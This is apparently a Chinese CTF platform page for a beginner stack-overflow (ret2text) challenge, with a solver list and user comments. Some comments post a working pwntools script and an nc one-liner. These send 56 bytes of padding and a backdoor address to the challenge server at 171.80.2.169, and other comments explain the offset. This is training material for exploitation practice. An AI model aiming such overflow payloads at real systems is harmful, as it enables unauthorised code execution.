评分(2)
解题动态
SecureMind_X 攻破了该题 1小时前
aqwzaa 攻破了该题 2小时前
dcnakcs 攻破了该题 3小时前
ASL 攻破了该题 6小时前
Linsudo 攻破了该题 9小时前
3370sc 攻破了该题 1天前
Aolodld 攻破了该题 1天前
longsk 攻破了该题 1天前
hycs 攻破了该题 2天前
solc 攻破了该题 2天前
Kakivare 攻破了该题 2天前
hsk_zy 攻破了该题 2天前
ShelleyHD 攻破了该题 2天前
af 攻破了该题 3天前
cai694569 攻破了该题 3天前
阳光小楠瓜 攻破了该题 3天前
九久 攻破了该题 3天前
jwz 攻破了该题 3天前
879205607 攻破了该题 3天前
评论
goby 6天前
举报
payload = b'a'*(0x30+8)+p64(get_shell_addr)
nirvana。 2月前
举报
在虚拟机中下好文件后,用终端打开下载目录,用unzip file.zip解压文件,ls查看文件,发现解压得到文件名为pwn2,用file pwn2分析,接着用nano exp.py编写Python脚本,最后python3 exp.py执行,得到flag
xtk 4月前
举报
from pwn import * io=remote("171.80.2.169",17626) payload=b'a'*(0x30+8)+p64(0x400751) io.recvline("say something?\n") io.sendline(payload) io.interactive()栈溢出覆盖返回地址到后门函数就好了
modeng 5月前
举报
这是我的思路,希望能帮到你解题 https://blog.csdn.net/m_de_g/article/details/155747760?spm=1001.2014.3001.5502
王安小子 5月前
举报
python3 -c 'print("A"*56 + "\x51\x07\x40\x00\x00\x00\x00\x00")' | nc 171.80.2.169 15170 就ok
乌鸦乌鸦乌鸦乌鸦 10月前
举报
为什么答案是56字节,我测出来是40字节
scust 9月前
举报
看到main中char s[48]; // [rsp+0h] [rbp-30h] BYREF没?padding = 0x30+8 #epb占用8个字节
weiyouzhunze 1年前
举报
栈溢出漏洞利用
afag 1年前
举报
0x30+8填充
17773146280 1年前
举报
简单的ret2text题目,后门函数地址加上缓冲区长度就可以了
YellowZy 1年前
举报
应该是从stack of main里面看到s到r的距离还有8字节的偏移,所以应该是48+8=56字节填充